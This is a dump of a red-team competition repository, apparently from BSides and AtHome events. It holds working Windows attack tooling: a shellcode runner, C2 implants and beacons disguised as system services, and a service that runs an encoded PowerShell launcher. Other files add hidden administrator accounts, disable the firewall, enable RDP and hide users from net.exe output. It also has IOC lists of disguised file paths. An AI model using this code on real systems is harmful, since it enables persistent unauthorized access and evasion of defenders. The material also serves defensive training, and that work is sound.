├── .gitattributes ├── AtHome-2020 ├── bc.go ├── beacon.c ├── beacon.go ├── elevate_exe.go ├── elevate_svc.go ├── empire.go ├── implant.go ├── implant_dns.go ├── net.go ├── ping_dll.go ├── ping_exe.go ├── ping_svc.go ├── tool.go └── user.go ├── BSidesDE-2021 ├── IOCs │ ├── README.md │ ├── agents.txt │ ├── launchers.txt │ ├── linked.txt │ ├── support.txt │ └── text.txt └── Souces │ ├── beacon.go │ ├── client.go │ ├── freeze.go │ ├── hook.c │ ├── server.go │ └── user.go ├── BSidesLV-2021 ├── IOCs │ ├── IOCs.txt │ ├── README.md │ ├── binaries.txt │ └── executors.txt ├── beacon.go ├── hooks │ ├── hook.c │ └── hook_rickroll.c ├── privs │ ├── client.go │ └── server.go └── user_add.go ├── BSidesLV-2022 ├── README.md ├── Support │ ├── build.sh │ └── src │ │ ├── duck.c │ │ ├── duck.rc │ │ ├── goose.c │ │ ├── goose.rc │ │ ├── manifest.rc │ │ ├── manifest.xml │ │ ├── nop.c │ │ └── nop_svc.c ├── cache.txt ├── files.txt └── webshell.asp ├── BSidesLV-2024 ├── README.md ├── RedTeamHotwash.pdf ├── Screenshots │ ├── screenshot-0.png │ ├── screenshot-1.png │ ├── screenshot-10.png │ ├── screenshot-11.png │ ├── screenshot-12.png │ ├── screenshot-13.png │ ├── screenshot-14.png │ ├── screenshot-15.png │ ├── screenshot-16.png │ ├── screenshot-17.png │ ├── screenshot-18.png │ ├── screenshot-19.png │ ├── screenshot-2.png │ ├── screenshot-20.png │ ├── screenshot-21.png │ ├── screenshot-22.png │ ├── screenshot-23.png │ ├── screenshot-24.png │ ├── screenshot-25.png │ ├── screenshot-26.png │ ├── screenshot-27.png │ ├── screenshot-28.png │ ├── screenshot-29.png │ ├── screenshot-3.png │ ├── screenshot-30.png │ ├── screenshot-31.png │ ├── screenshot-32.png │ ├── screenshot-33.png │ ├── screenshot-34.png │ ├── screenshot-35.png │ ├── screenshot-36.png │ ├── screenshot-4.png │ ├── screenshot-5.png │ ├── screenshot-6.png │ ├── screenshot-7.png │ ├── screenshot-8.png │ └── screenshot-9.png ├── Support │ ├── bitcoin.ico │ ├── bitcoin.rc │ ├── build.sh │ ├── dolphin.ico │ ├── dolphin.rc │ ├── duck.c │ 
├── duck.ico │ ├── duck.rc │ ├── hook.c │ ├── malware.ico │ ├── malware.rc │ ├── manifest.rc │ ├── manifest.xml │ ├── nop.c │ └── nop_svc.c ├── duck.md ├── files.md ├── hook.md ├── implants.md └── webshell.asp ├── LICENSE └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | *.jpg filter=lfs diff=lfs merge=lfs -text 2 | *.png filter=lfs diff=lfs merge=lfs -text 3 | *.ico filter=lfs diff=lfs merge=lfs -text 4 | *.pdf filter=lfs diff=lfs merge=lfs -text 5 | -------------------------------------------------------------------------------- /AtHome-2020/bc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "github.com/iDigitalFlame/xmt/cmd" 4 | 5 | func main() { 6 | c := cmd.Code{ 7 | Data: []byte("" + 8 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" + 9 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" + 10 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" + 11 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" + 12 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" + 13 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" + 14 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" + 15 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" + 16 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" + 17 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" + 18 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" + 19 | "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" + 20 | "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x97\x64\x40\x68" + 21 | "\x02\x00\x1f\x91\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" + 22 | "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2" + 23 | "\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6" + 24 | 
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44" + 25 | "\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56" + 26 | "\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff" + 27 | "\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6" + 28 | "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + 29 | "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5", 30 | ), 31 | } 32 | 33 | c.SetParentElevatedRandom(nil) 34 | 35 | c.Start() 36 | c.Wait() 37 | } 38 | -------------------------------------------------------------------------------- /AtHome-2020/beacon.c: -------------------------------------------------------------------------------- 1 | #define HOST "0.0.0.0\0" 2 | #define PORT "443\0" 3 | #define TOKEN ">\0" 4 | #define _WIN32_WINNT 0x0501 5 | 6 | #include 7 | 8 | int msg(char *host, char *port, char *data) { 9 | SOCKET s; 10 | struct addrinfo i, *a, *c; 11 | memset(&i, 0, sizeof(i)); 12 | i.ai_family = PF_INET; 13 | i.ai_socktype = SOCK_STREAM; 14 | if (getaddrinfo(host, port, &i, &a) != 0) { 15 | return 0; 16 | } 17 | for (c = a; c != NULL; c = c->ai_next) { 18 | s = socket(c->ai_family, c->ai_socktype, c->ai_protocol); 19 | if (s == INVALID_SOCKET) { 20 | continue; 21 | } 22 | if (connect(s, c->ai_addr, (int)c->ai_addrlen) != SOCKET_ERROR) { 23 | break; 24 | } 25 | closesocket(s); 26 | } 27 | freeaddrinfo(a); 28 | send(s, data, strlen(data), 0); 29 | closesocket(s); 30 | return 1; 31 | } 32 | int main() { 33 | WSADATA w; 34 | if (WSAStartup(MAKEWORD(2, 2), &w) != 0) { 35 | return 1; 36 | } 37 | msg(HOST, PORT, TOKEN); 38 | WSACleanup(); 39 | return 0; 40 | } -------------------------------------------------------------------------------- /AtHome-2020/beacon.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "net" 7 | "time" 8 | 9 | "golang.org/x/sys/windows/svc" 10 | ) 11 | 12 | const svcName = "windevsvc" 13 | 14 | type beacon 
struct{} 15 | 16 | func main() { 17 | svc.Run(svcName, beacon{}) 18 | } 19 | func (beacon) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 20 | i <- svc.Status{State: svc.StartPending} 21 | t := time.NewTicker(time.Minute * 1) 22 | defer t.Stop() 23 | if k, err := net.Dial("tcp", "0.0.0.0:443"); err == nil { 24 | k.Write([]byte("")) 25 | k.Close() 26 | } 27 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 28 | for { 29 | select { 30 | case q := <-r: 31 | switch q.Cmd { 32 | case svc.Interrogate: 33 | i <- q.CurrentStatus 34 | time.Sleep(100 * time.Millisecond) 35 | i <- q.CurrentStatus 36 | case svc.Stop, svc.Shutdown: 37 | i <- svc.Status{State: svc.StopPending} 38 | return false, 0 39 | default: 40 | } 41 | case <-t.C: 42 | if k, err := net.Dial("tcp", "0.0.0.0:443"); err == nil { 43 | k.Write([]byte("")) 44 | k.Close() 45 | } 46 | } 47 | } 48 | i <- svc.Status{State: svc.StopPending} 49 | return false, 0 50 | } 51 | -------------------------------------------------------------------------------- /AtHome-2020/elevate_exe.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | "strings" 9 | 10 | "github.com/iDigitalFlame/xmt/npipe" 11 | ) 12 | 13 | const pipeName = "cryptoproviderapi" 14 | 15 | func main() { 16 | if len(os.Args) == 1 { 17 | return 18 | } 19 | send(strings.Join(os.Args[1:], " ")) 20 | } 21 | func send(s string) { 22 | u, err := npipe.Dial(fmt.Sprintf(`\\.\pipe\%s`, pipeName)) 23 | if err != nil { 24 | panic(err) 25 | } 26 | if _, err := u.Write([]byte(s)); err != nil { 27 | panic(err) 28 | } 29 | u.Close() 30 | } 31 | -------------------------------------------------------------------------------- /AtHome-2020/elevate_svc.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 
| "bytes" 7 | "fmt" 8 | "io" 9 | "net" 10 | "strings" 11 | "sync" 12 | "time" 13 | 14 | "github.com/iDigitalFlame/xmt/cmd" 15 | "github.com/iDigitalFlame/xmt/npipe" 16 | 17 | "golang.org/x/sys/windows/svc" 18 | ) 19 | 20 | var bufs = sync.Pool{ 21 | New: func() interface{} { 22 | return new(bytes.Buffer) 23 | }, 24 | } 25 | 26 | const ( 27 | pipeName = "cryptoproviderapi" 28 | svcName = "powersvc" 29 | ) 30 | 31 | type elevate struct{} 32 | 33 | func main() { 34 | svc.Run(svcName, elevate{}) 35 | } 36 | func send(s string) { 37 | u, err := npipe.Dial(fmt.Sprintf(`\\.\pipe\%s`, pipeName)) 38 | if err != nil { 39 | panic(err) 40 | } 41 | if _, err := u.Write([]byte(s)); err != nil { 42 | panic(err) 43 | } 44 | u.Close() 45 | } 46 | func listen(l net.Listener) { 47 | for { 48 | c, err := l.Accept() 49 | if err != nil { 50 | e, ok := err.(net.Error) 51 | if ok && e.Timeout() { 52 | continue 53 | } 54 | if ok && !e.Timeout() && !e.Temporary() { 55 | break 56 | } 57 | continue 58 | } 59 | b := bufs.Get().(*bytes.Buffer) 60 | io.Copy(b, c) 61 | c.Close() 62 | e := cmd.Process{Args: cmd.Split(strings.ReplaceAll(string(b.Bytes()), "\n", ""))} 63 | e.SetNoWindow(true) 64 | e.SetWindowDisplay(0) 65 | b.Reset() 66 | bufs.Put(b) 67 | e.SetParentElevatedRandom(nil) 68 | e.Start() 69 | } 70 | } 71 | func (elevate) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 72 | i <- svc.Status{State: svc.StartPending} 73 | l, err := npipe.Listen(fmt.Sprintf(`\\.\pipe\%s`, pipeName)) 74 | if err != nil { 75 | i <- svc.Status{State: svc.StopPending} 76 | return false, 0 77 | } 78 | go listen(l) 79 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 80 | for { 81 | select { 82 | case q := <-r: 83 | switch q.Cmd { 84 | case svc.Interrogate: 85 | i <- q.CurrentStatus 86 | time.Sleep(100 * time.Millisecond) 87 | i <- q.CurrentStatus 88 | case svc.Stop, svc.Shutdown: 89 | l.Close() 90 | i <- svc.Status{State: svc.StopPending} 91 
| return false, 0 92 | default: 93 | } 94 | } 95 | } 96 | l.Close() 97 | i <- svc.Status{State: svc.StopPending} 98 | return false, 0 99 | } 100 | -------------------------------------------------------------------------------- /AtHome-2020/empire.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "net" 5 | "time" 6 | 7 | "github.com/iDigitalFlame/xmt/cmd" 8 | "golang.org/x/sys/windows/svc" 9 | ) 10 | 11 | const svcName = "dns" 12 | 13 | var pl = []string{`powershell`, `-noP`, `-sta`, `-w`, `1`, `-enc`, ``} 14 | 15 | type empire struct{} 16 | 17 | func main() { 18 | svc.Run(svcName, empire{}) 19 | } 20 | func beacon() { 21 | k, err := net.DialTimeout("tcp", "0.0.0.0:443", time.Second*4) 22 | if err != nil { 23 | return 24 | } 25 | k.Write([]byte("")) 26 | k.Close() 27 | } 28 | func run(a ...string) { 29 | x := &cmd.Process{Args: a} 30 | x.SetParentElevatedRandom(nil) 31 | x.Run() 32 | } 33 | func (empire) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 34 | i <- svc.Status{State: svc.StartPending} 35 | var ( 36 | e *cmd.Process 37 | t = time.NewTicker(time.Second * 5) 38 | n = time.NewTicker(time.Minute) 39 | ) 40 | defer func() { 41 | t.Stop() 42 | n.Stop() 43 | }() 44 | beacon() 45 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 46 | for { 47 | select { 48 | case q := <-r: 49 | switch q.Cmd { 50 | case svc.Interrogate: 51 | i <- q.CurrentStatus 52 | time.Sleep(100 * time.Millisecond) 53 | i <- q.CurrentStatus 54 | case svc.Stop, svc.Shutdown: 55 | i <- svc.Status{State: svc.StopPending} 56 | return false, 0 57 | default: 58 | } 59 | case <-n.C: 60 | beacon() 61 | case <-t.C: 62 | if e == nil || !e.Running() { 63 | e = &cmd.Process{Args: pl} 64 | e.SetParentElevatedRandom(nil) 65 | e.Start() 66 | } 67 | run("net", "user", "HulkHogan", "Brother123456", "/add") 68 | run("net", "user", "HulkHogan", "/active:yes") 69 | 
run("net", "localgroup", "Administrators", "HulkHogan", "/add") 70 | run("sc", "start", "TermService") 71 | run("netsh", "firewall", "set", "opmode", "disable") 72 | run("reg", "add", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "/v", "fDenyTSConnections", "/t", "REG_DWORD", "/d", "0", "/f") 73 | run("reg", "add", "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", "/v", "HulkHogan", "/t", "REG_DWORD", "/d", "0", "/f") 74 | } 75 | } 76 | i <- svc.Status{State: svc.StopPending} 77 | return false, 0 78 | } 79 | -------------------------------------------------------------------------------- /AtHome-2020/implant.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "time" 6 | 7 | "github.com/PurpleSec/logx" 8 | "github.com/iDigitalFlame/xmt/c2" 9 | "github.com/iDigitalFlame/xmt/man" 10 | ) 11 | 12 | func main() { 13 | 14 | man.MustGuard("thisisapipe") 15 | 16 | var ( 17 | s = c2.NewServer(logx.NOP) 18 | c = c2.Config{ 19 | c2.Sleep(time.Second * 20), 20 | c2.Jitter(75), 21 | c2.ConnectTCP, 22 | c2.WrapZlib, 23 | } 24 | p, _ = c.Profile() 25 | ) 26 | 27 | z, err := s.Connect("0.0.0.0:8080", nil, p) 28 | if err != nil { 29 | os.Exit(1) 30 | } 31 | z.Wait() 32 | } 33 | -------------------------------------------------------------------------------- /AtHome-2020/implant_dns.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "time" 6 | 7 | "github.com/PurpleSec/logx" 8 | "github.com/iDigitalFlame/xmt/c2" 9 | "github.com/iDigitalFlame/xmt/man" 10 | ) 11 | 12 | func main() { 13 | 14 | man.MustGuard("thisisapipe") 15 | 16 | var ( 17 | s = c2.NewServer(logx.NOP) 18 | c = c2.Config{ 19 | c2.Sleep(time.Second * 10), 20 | c2.Jitter(50), 21 | c2.ConnectUDP, 22 | c2.WrapZlib, 23 | c2.TransformDNS(), 24 | } 25 | p, _ = c.Profile() 26 | ) 27 | 28 | z, err 
:= s.Connect("0.0.0.0:53", nil, p) 29 | if err != nil { 30 | os.Exit(1) 31 | } 32 | z.Wait() 33 | } 34 | -------------------------------------------------------------------------------- /AtHome-2020/net.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "strings" 7 | 8 | "github.com/iDigitalFlame/xmt/cmd" 9 | ) 10 | 11 | var a = []string{"Eve", "john", "admin9", "derp", "dadmin"} 12 | 13 | func main() { 14 | var ( 15 | e = cmd.Process{Args: append([]string{`C:\Windows\System32\net2.exe`}, os.Args[1:]...)} 16 | o, _ = e.CombinedOutput() 17 | p = string(o) 18 | ) 19 | 20 | if len(os.Args) == 2 && strings.Contains(strings.ToLower(os.Args[1]), "user") { 21 | for i := range a { 22 | p = strings.ReplaceAll(p, a[i], "") 23 | } 24 | } 25 | 26 | fmt.Println(p) 27 | } 28 | -------------------------------------------------------------------------------- /AtHome-2020/ping_dll.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "github.com/iDigitalFlame/xmt/data/crypto" 7 | "github.com/iDigitalFlame/xmt/man" 8 | ) 9 | 10 | 11 | func main() {} 12 | 13 | //export StartA 14 | func StartA() { 15 | 16 | man.Sentinel{ 17 | Paths: []string{ 18 | "C:\Windows\System32\compmgr.exe", 19 | "C:\Windows\System32\filtermgr.exe", 20 | }, 21 | } 22 | man.Ping("thisisapipe") 23 | } 24 | -------------------------------------------------------------------------------- /AtHome-2020/ping_exe.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "github.com/iDigitalFlame/xmt/data/crypto" 7 | "github.com/iDigitalFlame/xmt/man" 8 | ) 9 | 10 | var ( 11 | v0 = crypto.XOR(x(63, []byte{19, 37, 35, 18, 34, 29, 40, 12, 46, 36, 28, 41})) 12 | v1 = x(63, []byte{4, 250, 27, 21, 38, 42, 31, 41, 48, 43, 19, 9, 46, 39, 39, 23, 30, 227, 
225, 10, 32, 20, 16, 22, 21, 253, 240, 217, 215, 210, 7, 14, 13}) 13 | v2 = x(63, []byte{24, 41, 45, 34, 44, 51, 14, 31, 28, 8, 41, 37, 43, 245, 3, 251}) 14 | v3 = x(63, []byte{41, 52, 51, 46, 247, 235, 234, 235, 242, 234, 229, 231, 235, 236, 225, 226, 223, 225, 233, 230, 221, 228, 219, 217, 16, 29, 8, 24, 9}) 15 | ) 16 | 17 | func main() { 18 | man.SentinelFromXORFile(v1, v2, v3, v0) 19 | } 20 | func x(v int, b []byte) string { 21 | for i := range b { 22 | b[i] += byte(i + v) 23 | } 24 | return string(b) 25 | } 26 | -------------------------------------------------------------------------------- /AtHome-2020/ping_svc.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "sync/atomic" 7 | "time" 8 | 9 | "github.com/iDigitalFlame/xmt/data/crypto" 10 | "github.com/iDigitalFlame/xmt/man" 11 | 12 | "golang.org/x/sys/windows/svc" 13 | ) 14 | 15 | var ( 16 | v0 = crypto.XOR(x(60, []byte{22, 40, 38, 21, 37, 32, 43, 15, 49, 39, 31, 44})) 17 | v1 = x(60, []byte{7, 253, 30, 39, 41, 43, 35, 235, 48, 51, 46}) 18 | v2 = x(60, []byte{27, 44, 48, 37, 47, 54, 17, 34, 31, 11, 44, 40, 46, 248, 6, 254}) 19 | v3 = x(60, []byte{44, 55, 54, 49, 250, 238, 237, 238, 243, 237, 232, 234, 238, 229, 231, 236, 230, 225, 227, 235, 232, 223, 230, 222, 219, 18, 216, 14, 32, 12}) 20 | ) 21 | 22 | const svcName = "ShellHardwareAPI" 23 | 24 | type ping struct{} 25 | 26 | func main() { 27 | svc.Run(svcName, ping{}) 28 | } 29 | func x(v int, b []byte) string { 30 | for i := range b { 31 | b[i] += byte(i + v) 32 | } 33 | return string(b) 34 | } 35 | func (ping) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 36 | i <- svc.Status{State: svc.StartPending} 37 | var ( 38 | t = time.NewTicker(time.Second * 5) 39 | d uint32 40 | ) 41 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 42 | for atomic.LoadUint32(&d) == 0 { 43 | select { 44 | case 
<-t.C: 45 | man.SentinelFromXORFile(v1, v2, v3, v0) 46 | case q := <-r: 47 | switch q.Cmd { 48 | case svc.Interrogate: 49 | i <- q.CurrentStatus 50 | time.Sleep(100 * time.Millisecond) 51 | i <- q.CurrentStatus 52 | case svc.Stop, svc.Shutdown: 53 | atomic.StoreUint32(&d, 1) 54 | default: 55 | } 56 | } 57 | } 58 | t.Stop() 59 | i <- svc.Status{State: svc.StopPending} 60 | return false, 0 61 | } 62 | -------------------------------------------------------------------------------- /AtHome-2020/tool.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "strconv" 7 | "strings" 8 | 9 | "github.com/iDigitalFlame/xmt/util" 10 | ) 11 | 12 | func main() { 13 | var u, f, n, x string 14 | 15 | flag.StringVar(&n, "n", "WindowSecProvAPI", "Pipe Name") 16 | flag.StringVar(&f, "f", "C:\\Windows\\System32\\shellUI32.dll", "Binary List Path") 17 | flag.StringVar(&x, "x", "RedTeamRules", "Binary List XOR Key") 18 | flag.StringVar(&u, "u", "http://192.168.0.1:8080/guard", "Last Resort Download URL") 19 | flag.Parse() 20 | 21 | var ( 22 | r = util.Rand.Intn(100) 23 | eU, eF, eN, eX = []byte(u), []byte(f), []byte(n), []byte(x) 24 | ) 25 | shuffle(r, eU) 26 | shuffle(r, eF) 27 | shuffle(r, eN) 28 | shuffle(r, eX) 29 | 30 | fmt.Printf( 31 | "\nvar (\n\tv0 = crypto.XOR(x(%d, []byte{%s}))\n\tv1 = x(%d, []byte{%s})\n\tv2 = x(%d, []byte{%s})\n\tv3 = x(%d, []byte{%s})\n)\n\n", 32 | r, output(eX), 33 | r, output(eF), 34 | r, output(eN), 35 | r, output(eU), 36 | ) 37 | } 38 | func output(b []byte) string { 39 | var s strings.Builder 40 | for i := range b { 41 | if i > 0 { 42 | s.WriteRune(',') 43 | } 44 | s.WriteString(strconv.Itoa(int(b[i]))) 45 | } 46 | return s.String() 47 | } 48 | func shuffle(r int, b []byte) { 49 | for i := range b { 50 | b[i] -= byte(i + r) 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /AtHome-2020/user.go: 
-------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | "os/signal" 9 | "syscall" 10 | "time" 11 | 12 | "github.com/iDigitalFlame/xmt/cmd" 13 | "golang.org/x/sys/windows/svc" 14 | ) 15 | 16 | const ( 17 | svcName = "dwmsvc" 18 | ) 19 | 20 | type user struct{} 21 | 22 | func main() { 23 | svc.Run(svcName, user{}) 24 | } 25 | func (user) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 26 | i <- svc.Status{State: svc.StartPending} 27 | t := time.NewTicker(time.Second * 5) 28 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 29 | for { 30 | select { 31 | case q := <-r: 32 | switch q.Cmd { 33 | case svc.Interrogate: 34 | i <- q.CurrentStatus 35 | time.Sleep(100 * time.Millisecond) 36 | i <- q.CurrentStatus 37 | case svc.Stop, svc.Shutdown: 38 | t.Stop() 39 | i <- svc.Status{State: svc.StopPending} 40 | return false, 0 41 | default: 42 | } 43 | case <-t.C: 44 | cmd.NewProcess("net", "user", "Kyle", "Password123", "/add").CombinedOutput() 45 | fmt.Println(cmd.NewProcess("net", "user", "Kyle", "/active:yes").CombinedOutput()) 46 | cmd.NewProcess("net", "localgroup", "Administrators", "Kyle", "/add").CombinedOutput() 47 | } 48 | } 49 | t.Stop() 50 | i <- svc.Status{State: svc.StopPending} 51 | return false, 0 52 | } 53 | 54 | func Run(name string, handler svc.Handler) error { 55 | 56 | cmds := make(chan svc.ChangeRequest) 57 | changes := make(chan svc.Status) 58 | 59 | sig := make(chan os.Signal) 60 | signal.Notify(sig) 61 | 62 | go func() { 63 | status := svc.Status{State: svc.Stopped} 64 | for { 65 | select { 66 | case <-sig: 67 | cmds <- svc.ChangeRequest{Cmd: svc.Stop, CurrentStatus: status} 68 | case status = <-changes: 69 | } 70 | } 71 | }() 72 | 73 | _, errno := handler.Execute([]string{name}, cmds, changes) 74 | if errno != 0 { 75 | return syscall.Errno(errno) 76 | } 77 | return nil 78 | } 
79 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/README.md: -------------------------------------------------------------------------------- 1 | # IOC files 2 | 3 | This is a somewhat complete list of the IOCs and files used during the CTF. 4 | 5 | ## agents.txt 6 | 7 | Processes/files that would connect to the C2. 8 | 9 | ## launchers.txt 10 | 11 | Files that would be used for persistence. 12 | 13 | ## text.txt 14 | 15 | Files that were accessed or read by the agents. These can be used to track execution. 16 | 17 | ## linked.txt 18 | 19 | Files used as cradles for support, or to launch another process. These are basically 20 | DLL files that redirected to another DLL. 21 | 22 | ## support.txt 23 | 24 | Files used for support structures that may be called by Windows-specific APIs. 25 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/agents.txt: -------------------------------------------------------------------------------- 1 | C:\Program Files (x86)\Common Files\System\Ole DB\scheksvc.dll 2 | C:\Windows\apppatch\agilehpn.exe 3 | C:\Windows\WinSxS\itarcl.exe 4 | C:\Windows\SysWOW64\downlevel\adsmsevt.dll 5 | C:\Windows\System32\setup\YBDINUK2.exe 6 | C:\Windows\SysWOW64\Com\BQIBME0A.exe 7 | C:\Windows\System32\AdvancedInstallers\tcpmonli.dll 8 | C:\Windows\Microsoft.NET\NlsLexicons0003.dll 9 | C:\Windows\Microsoft.NET\KBDHZ1.exe 10 | C:\Windows\System32\oobe\esscai.dll 11 | C:\Windows\System32\migration\mqader15.exe 12 | C:\Windows\Microsoft.NET\samlie.exe 13 | C:\Windows\WinSxS\bebengine.exe 14 | C:\Program Files\Common Files\System\Ole DB\jouclass.exe 15 | C:\ProgramData\Microsoft\Windows\Caches\mdmkn.dll 16 | C:\Windows\apppatch\ServerRestoreWizarh.dll 17 | C:\Windows\SysWOW64\OSPiovider.exe 18 | C:\Windows\WinSxS\sxmig.exe 19 | C:\Program Files (x86)\Common Files\System\Ole DB\nrth.exe 20 | C:\Windows\apppatch\d3d15.dll 21 | 
C:\Windows\SysWOW64\setup\WSSynb.exe 22 | C:\Windows\System32\cofirodm.dll 23 | C:\Windows\SysWOW64\setup\WcnAfi.exe 24 | C:\ProgramData\Microsoft\Windows\Caches\gultiprt.exe 25 | C:\Windows\System32\oobe\KBDHELU2.dll 26 | C:\Program Files\Common Files\System\ado\WppReyorder.dll 27 | C:\Windows\security\McxDrev.dll 28 | C:\ProgramData\Microsoft\Windows\Caches\djgi.exe 29 | C:\Windows\servicing\workcrdd.dll 30 | C:\Windows\Microsoft.NET\mfxoci.dll 31 | C:\Windows\System32\Sysprep\CMJPDCTP.dll 32 | C:\Program Files (x86)\Common Files\System\suk.dll 33 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/launchers.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\SysWOW64\migwiz\thumbmache.exe 2 | C:\Windows\System32\Com\wtlmsrv.exe 3 | C:\Windows\SysWOW64\AdvancedInstallers\wvmbuthid.dll 4 | C:\Windows\SysWOW64\downlevel\msdtqprf.dll 5 | C:\Program Files\Common Files\System\ado\spiizres.dll 6 | C:\Windows\SysWOW64\Com\oleagt32.exe 7 | C:\Windows\SysWOW64\setup\webwheck.exe 8 | C:\Program Files (x86)\Internet Explorer\nvramd.dll 9 | C:\Windows\System32\Boot\DAFGSD.dll 10 | C:\Windows\SysWOW64\migration\BioWredProv.dll 11 | C:\Windows\security\sqlceolehb40.exe 12 | C:\Program Files\Common Files\System\ado\mikssrv.dll 13 | C:\Windows\SysWOW64\migration\svi.dll 14 | C:\Windows\SysWOW64\AdvancedInstallers\WABSyncArovider.exe 15 | C:\Windows\Panther\NlgLexicons0047.exe 16 | C:\Windows\System32\en\ddppipelide.dll 17 | C:\Windows\System32\msvsm90.dll 18 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/linked.txt: -------------------------------------------------------------------------------- 1 | C:\Program Files\Common Files\System\msadc\sthrvsc.dll 2 | C:\Windows\SysWOW64\en\tertkbd.dll 3 | C:\Windows\Panther\agrsj64.dll 4 | C:\Windows\SysWOW64\en\wuausmrv.dll 5 | C:\Windows\System32\AdvancedInstallers\sppogrss.dll 6 | 
C:\Windows\apppatch\wuaueyg.dll 7 | C:\Windows\System32\migwiz\FwRemoteSor.dll 8 | C:\Windows\apppatch\EventVijwer.dll 9 | C:\Windows\SysWOW64\wbem\UserLanguageProfileXallback.dll 10 | C:\Windows\System32\tpmscrsigplugin.dll 11 | C:\Windows\Panther\msvclt.dll 12 | C:\Windows\Panther\tcpibcfg.dll 13 | C:\Program Files (x86)\Common Files\System\Ole DB\imaxeres.dll 14 | C:\ProgramData\Microsoft\Windows\Caches\WMVCNRE.dll 15 | C:\Windows\apppatch\SVClient.dll 16 | C:\Program Files (x86)\Common Files\System\msadc\napqsnap.dll 17 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/support.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\System32\mfvdpp.dll 2 | C:\Windows\System32\bsrpc.dll 3 | C:\Windows\System32\tyinapi.dll 4 | C:\Windows\System32\CIHL4809.dll 5 | C:\Windows\System32\mhmadc.exe 6 | C:\Windows\System32\unbscan.scr 7 | C:\Windows\System32\msvsm90.dll 8 | C:\Windows\System32\KQDFO.dll 9 | C:\Windows\System32\vdrvrost.dll 10 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/text.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\SysWOW64\drivers\en-US\lltuio.mui 2 | 